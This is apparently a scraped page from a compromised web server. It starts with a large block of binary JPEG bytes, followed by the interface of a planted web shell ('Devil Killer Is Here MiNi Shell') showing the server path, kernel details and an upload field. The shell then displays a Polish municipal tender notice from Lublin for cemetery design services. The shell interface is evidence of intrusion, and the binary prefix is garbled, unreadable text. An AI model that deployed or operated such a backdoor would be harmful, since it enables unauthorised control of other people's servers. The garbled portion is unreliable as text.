JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221003/0037498601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie kompletnej wielobranżowej dokumentacji projektowo - kosztorysowej oraz pełnienie kompleksowych nadzorów autorskich dla zadania &#34;Budowa cmentarza przy ulicy Zelwerowicza w Lublinie... </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Lublin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019514</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Króla Władysława Łokietka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-109</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@lublin.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lublin.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie kompletnej wielobranżowej dokumentacji projektowo - kosztorysowej oraz pełnienie kompleksowych nadzorów autorskich dla zadania &#34;Budowa cmentarza przy ulicy Zelwerowicza w Lublinie... </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-368adbae-2504-11ed-b8b2-9a321cc30829</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00374986</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00337941/46/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.61 Wykonanie kompletnej wielobranżowej dokumentacji projektowo - kosztorysowej oraz pełnienie kompleksowych nadzorów autorskich dla zadania budowa cmentarza przy ulicy Zelwerowicza w Lublinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ oraz ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>4. We wszelkiej korespondencji związanej z niniejszym postępowaniem należy posługiwać się numerem referencyjnym: ZP-P-I.271.73.2022.<br/>5. Za termin przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>6. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>7. Wszelkie dokumenty, zawiadomienia oraz informacje przekazywane przez wykonawcę po otwarciu ofert, powinny być przekazywane ze skrzynki ePUAP Wykonawcy wskazanej w ofercie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Klauzula informacyjna z art. 13 RODO<br/>1.1. Zgodnie z art.13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>Zamawiający informuje, że:<br/>1.1.1. Administratorem Pani/Pana danych osobowych jest Prezydent Miasta<br/>Lublin; dane adresowe:Plac Króla Władysława Łokietka 1, 20–109 Lublin.<br/>1.1.2. Wyznaczyliśmy inspektora ochrony danych, z którym może Pani/Pan kontaktować się we wszystkich sprawach dotyczących<br/>przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych poprzez: email:iod@lublin.eu lub pisemnie na adres Administratora danych.<br/>1.1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego.<br/>1.1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18-19 oraz art. 74-76 ustawy.<br/>1.1.5. Z danych osobowych będziemy korzystać do momentu zakończenia realizacji celu określonego w pkt 1.1.3 tj. zgodnie z art. 78<br/>ust. 1 ustawy, przez 4 lat od dnia zakończenia postępowania o udzielenie zamówienia . Po tym czasie z danych będziemy korzystać<br/>przez okres oraz w zakresie wymaganym przez przepisy powszechnie obowiązującego prawa.<br/>1.1.6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy.<br/>1.1.7. W odniesieniu do Pani/Pana danych osobowych decyzje<br/>nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.1.1.8. Posiada Pani/Pan:<br/>1.1.8.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>1.1.8.2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych,<br/>1.1.8.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ustosobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>1.1.9. nie przysługuje Pani/Panu:<br/>1.1.9.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>1.1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w<br/>art. 20RODO;<br/>1.1.9.3.na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-P-I.271.73.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie kompletnej wielobranżowej dokumentacji projektowo – kosztorysowej oraz pełnienie kompleksowych nadzorów autorskich dla zadania „Budowa cmentarza przy ulicy Zelwerowicza w Lublinie wraz z obiektami kubaturowymi (domem pogrzebowym, kaplicą, spopielarnią zwłok, budynkami gospodarczymi i usługowymi), małą architekturą oraz zielenią, systemem komunikacji zewnętrznej i wewnętrznej i infrastrukturą techniczną.<br/>1.1. Zakres zamówienia obejmuje <br/>1.1.1. Etap I - Wykonanie i uzgodnienie projektu koncepcyjnego na budowę cmentarza przy ulicy Zelwerowicza w Lublinie wraz z obiektami kubaturowymi (domem pogrzebowym, kaplicą, spopielarnią zwłok, budynkami gospodarczymi i usługowymi), małą architekturą oraz zielenią, systemem komunikacji zewnętrznej i wewnętrznej i infrastrukturą techniczną (opracowania dalej zwanego „projektem koncepcyjnym”) obejmującego tereny oznaczone w MPZP: 1ZC, Uzc, U, ZC2, 1KP, PP, ZT, 2ZP, 3ZP, 1KDD/KS , 1KDD, 2KDD, 1KS, 2KS i 1KX, w tym:<br/>a) pozyskanie aktualnej mapy do celów projektowych,<br/>b) wykonanie niezbędnej inwentaryzacji budowlanej, architektonicznej i dendrologicznej w zakresie niezbędnym do celów wyburzeniowych i projektowych, w tym niezbędnej wycinki, pielęgnacji, prześwietleń i realizacji nasadzeń,<br/>c) wykonanie projektu koncepcyjnego,<br/>d) uzgodnienie projektu koncepcyjnego z Zamawiającym.<br/>1.1.2. Etap II - Wykonanie kompletnej wielobranżowej dokumentacji projektowo - kosztorysowej na budowę I etapu cmentarza przy ulicy Zelwerowicza w Lublinie wraz z obiektami kubaturowymi (domem pogrzebowym, kaplicą, spopielarnią zwłok, budynkami gospodarczymi i usługowymi), małą architekturą oraz zielenią, systemem komunikacji zewnętrznej i wewnętrznej i infrastrukturą techniczną, na podstawie uzgodnionego projektu koncepcyjnego, obejmującej:<br/> 1) pozyskanie we własnym zakresie i na własny koszt w imieniu Zamawiającego (na podstawie upoważnienia) warunków / decyzji / opinii / uzgodnień niezbędnych do projektowania i uzyskania decyzji o pozwoleniu na budowę, decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, w tym warunków od gestorów mediów, warunków w zakresie obsługi komunikacyjnej, a w przypadku wystąpienia kolizji z istniejącą infrastrukturą podziemną, nadziemną, zielenią (drzewa, krzewy) pozyskanie niezbędnych warunków / decyzji od gestorów mediów / właściwego urzędu, umożliwiających wykonanie dokumentacji usunięcia kolizji, w tym wycinki drzew oraz przekazanie oryginałów Zamawiającemu,<br/>2) wykonanie projektów rozbiórek w zakresie niezbędnym do uzyskania decyzji o pozwoleniu na rozbiórkę wraz z kosztorysem inwestorskim, przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót budowlanych oraz BIOZ,<br/>3) wykonanie pierwszego etapu kompletnej wielobranżowej dokumentacji projektowo - kosztorysowej na budowę cmentarza wraz z obiektami kubaturowymi, małą architekturą oraz zielenią, drogami dojazdowymi, terenami obsługi komunikacji, terenami parkingów i placów, ciągami pieszymi, drogami rowerowymi i infrastrukturą techniczną, w tym z niezbędnymi sieciami sanitarnymi, elektrycznymi i elektroenergetycznymi, zgodnie z obowiązującymi przepisami, normami, warunkami wzoru umowy oraz na podstawie pozyskanych warunków / decyzji / opinii / uzgodnień, w sposób umożliwiający uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia i pozwolenia na budowę,<br/>4) w zakresie gospodarki wodami deszczowymi należy wykonać niezbędne badania hydrologiczne, obliczenia i analizy oraz zaprojektować kompleksowe rozwiązania docelowe dotyczące odprowadzenia wód deszczowych z całego obszaru cmentarza objętego koncepcją, z rozwiązaniem systemu gospodarki wodami opadowymi ( system retencji w np. zbiornikach i basenie parkowym, system nawadniania), wraz uzyskaniem pozwolenia wodnoprawnego,<br/>5) uzgodnienie wielobranżowej dokumentacji projektowo - kosztorysowej z Zamawiającym, użytkownikiem wskazanym przez Zamawiającego, właściwymi organami i dysponentami mediów,<br/>6) wykonanie niezbędnych badań geotechnicznych i hydrogeologicznych gruntu dla obszaru objętego przedmiotem zamówienia wraz z właściwą dokumentacją i opinią geotechniczną oraz hydrogeologiczną, umożliwiających zaprojektowanie posadowienia wszystkich elementów – obiektów budowlanych wchodzących w zakres przedmiotu umowy,<br/>7) wykonanie zbiorczych zestawień planowanych kosztów inwestycji.<br/>1.1.3. Etap III - Przygotowanie dokumentacji środowiskowej, w tym raportu oddziaływania na środowisko oraz przeprowadzenie procedur środowiskowych, w tym:<br/>przygotowanie materiałów i dokumentów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, z wypełnionym wnioskiem o uzyskanie tej decyzji (łącznie z wykonaniem karty informacyjnej przedsięwzięcia i projektu) zgodnie z wymogami ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko, wraz z wykonaniem raportu o oddziaływaniu planowanego przedsięwzięcia na środowisko (jeżeli będzie wymagany do uzyskania decyzji środowiskowej) oraz uczestniczenie w procedurze uzyskania decyzji zgody na realizację przedsięwzięcia, w szczególności poprzez składanie wyjaśnień i uzupełnianie dokumentacji o niezbędne opracowania – elementy dokumentacji na wezwanie organu.<br/>1.1.4. Etap IV - Pełnienie kompleksowych nadzorów autorskich:<br/>1) pełnienie nadzoru autorskiego na etapie postępowania przetargowego dotyczącego wyboru wykonawcy na roboty budowlane w zakresie określonym w § 3 ust. 1 pkt 32 wzoru umowy,<br/>2) pełnienie nadzoru autorskiego podczas realizacji robót budowlanych prowadzonych w oparciu o dokumentację projektową stanowiącą przedmiot zamówienia,<br/>3) wyjaśnianie wątpliwości dotyczących rozwiązań zawartych w dokumentacji projektowej pojawiających się w toku realizacji inwestycji,<br/>4) uzupełnianie szczegółów dokumentacji projektowej oraz wyjaśnianie wątpliwości w tym zakresie pojawiających się w toku realizacji inwestycji,<br/>5) ścisła współpraca ze wszystkimi uczestnikami procesu budowlanego,<br/>6) udział w komisjach odbiorowych i naradach technicznych na budowie.<br/>2. Pełna nazwa zamówienia: wykonanie kompletnej wielobranżowej dokumentacji projektowo – kosztorysowej oraz pełnienie kompleksowych nadzorów autorskich dla zadania „Budowa cmentarza przy ulicy Zelwerowicza w Lublinie wraz z obiektami kubaturowymi (domem pogrzebowym, kaplicą, spopielarnią zwłok, budynkami gospodarczymi i usługowymi), małą architekturą oraz zielenią, systemem komunikacji zewnętrznej i wewnętrznej i infrastrukturą techniczną. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby w projektowaniu w specjalności architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. w zakresie zdolności technicznej lub zawodowej Zamawiający określa minimalne poziomy zdolności dotyczące:<br/>1.1. niezbędnych kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości<br/>1.1.1.dysponowaniem osobą/ami posiadającą/ymi odpowiednie uprawnienia budowlane do projektowania w specjalności: <br/>1) architektonicznej <br/>2) konstrukcyjno - budowlanej<br/>3) inżynieryjnej drogowej <br/>4) instalacyjnej w zakresie sieci, instalacji i urządzeń:<br/>4.1) telekomunikacyjnych <br/> 4.2) cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych <br/>4.3) elektrycznych i elektroenergetycznych <br/>(podstawa prawna art. 14 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane t. j. Dz. U. z 2021 r. poz. 2351 ze zmianami). <br/>1.2. niezbędnego doświadczenia wykonawcy umożliwiającego realizację zamówienia na odpowiednim poziomie jakości:<br/>1.2.1. Wykazanie się wykonaniem:<br/>1.2.1.1. jednej wielobranżowej dokumentacji projektowej (obejmującej: projekty budowlane i wykonawcze, specyfikacje techniczne wykonania i odbioru robót budowlanych) na budowę lub przebudowę terenów parkowych o obszarze co najmniej 1,00 ha wykonanych w okresie ostatnich 5 lat, licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie;<br/> lub<br/> - jednej wielobranżowej dokumentacji projektowej (obejmującej: projekty budowlane i wykonawcze, specyfikacje techniczne wykonania i odbioru robót budowlanych) na budowę lub przebudowę przestrzeni publicznej obejmującej tereny zielone o powierzchni terenu zielonego co najmniej 1,00 ha, wykonanych w okresie ostatnich 5 lat, licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie;<br/>1.2.1.2. dwóch wielobranżowych dokumentacji projektowych (obejmujących: projekty budowlane i wykonawcze, specyfikacje techniczne wykonania i odbioru robót budowlanych) na budowę obiektu użyteczności publicznej o powierzchni zabudowy co najmniej 2 500 m² lub kubaturze co najmniej 50 000 m³ każda dokumentacja wykonanych w okresie ostatnich 5 lat, licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.<br/>2. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>3. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu oraz 